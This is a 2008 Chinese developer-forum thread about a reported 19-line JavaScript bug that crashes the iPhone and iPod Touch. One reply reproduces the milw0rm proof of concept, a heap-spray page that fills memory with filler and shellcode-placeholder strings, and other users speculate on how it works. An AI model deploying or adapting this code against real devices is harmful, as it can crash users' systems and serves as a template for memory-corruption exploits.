浏览 4465 次
精华帖 (0) :: 良好帖 (0) :: 新手帖 (0) :: 隐藏帖 (0)
|
|
---|---|
作者 | 正文 |
发表时间:2008-02-09
引用 19行js代码击垮iPhone与iPod Touch
ugmbbc发布于 2008-02-08 10:58:02|3579 次阅读 字体:大 小 打印预览 安全研究人员发现了iPhone与iPod Touch的危急漏洞,可以导致内存耗尽后的拒绝服务. 攻击者只需要使用一段只有19行的Javascript代码就可以轻松让使用Mac OS X移动版系统内核崩溃并重新启动. 这一代码可以随意嵌入页面让iPhone崩溃,但没有迹象表明它能偷窃数据. 目前苹果没有给出任何修复方案,只能禁用JavaScript以保证安全, 原文见这里 手头没有iPhone没有iPod Touch,但是这些是可编程的东西。手头有IE,有FF。可以模拟一半~ 一个小想法,还得靠大家,顺着新闻写个19行。~ 声明:ITeye文章版权属于作者,受法律保护。没有作者书面许可不得转载。
推荐链接
|
|
返回顶楼 | |
发表时间:2008-02-09
我猜是递归...
|
|
返回顶楼 | |
发表时间:2008-02-10
jvm 只需要一句 System.exist(0);
|
|
返回顶楼 | |
发表时间:2008-02-10
代码来了。。哪位大侠解释下到底在干哈?
<html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html> # milw0rm.com [2008-01-24] |
|
返回顶楼 | |
发表时间:2008-02-10
|
|
返回顶楼 | |
发表时间:2008-02-10
直接被mcafee删除...
|
|
返回顶楼 | |
发表时间:2008-02-10
windowsXP下吞噬掉200M内存,,,iPhone内存多大?。。。足够溢出了?。。
|
|
返回顶楼 | |
发表时间:2008-02-10
自问自答了 足够。。。
引用 手机类型 智能手机;音乐手机;拍照手机 手机制式 GSM 支持频段 GSM850/900/1800/1900MHz 屏幕材质 TFT 屏幕色彩 1600万色彩屏 主屏尺寸 3.5英寸 主屏参数 480×320分辨率 触摸屏 支持 操作系统 Mac OS X系统 v10.4.8 硬件系统 ARM1176JZ-F 核心 图形处理单元:Power-VR SG引擎 内存:128M Mobile DDR 基本配置 锂电池、立体声耳机 (可接听电话)、充电器、支架连接到USB Cable,USB电源插头、说明书、清洁布 理论通话时间 大于8小时 理论待机时间 大于250小时 上市日期 2007年6月29日(美国上市) |
|
返回顶楼 | |
发表时间:2008-02-13
直接字符串相加就可以溢出吗?直接从数据区溢出到代码区?
|
|
返回顶楼 | |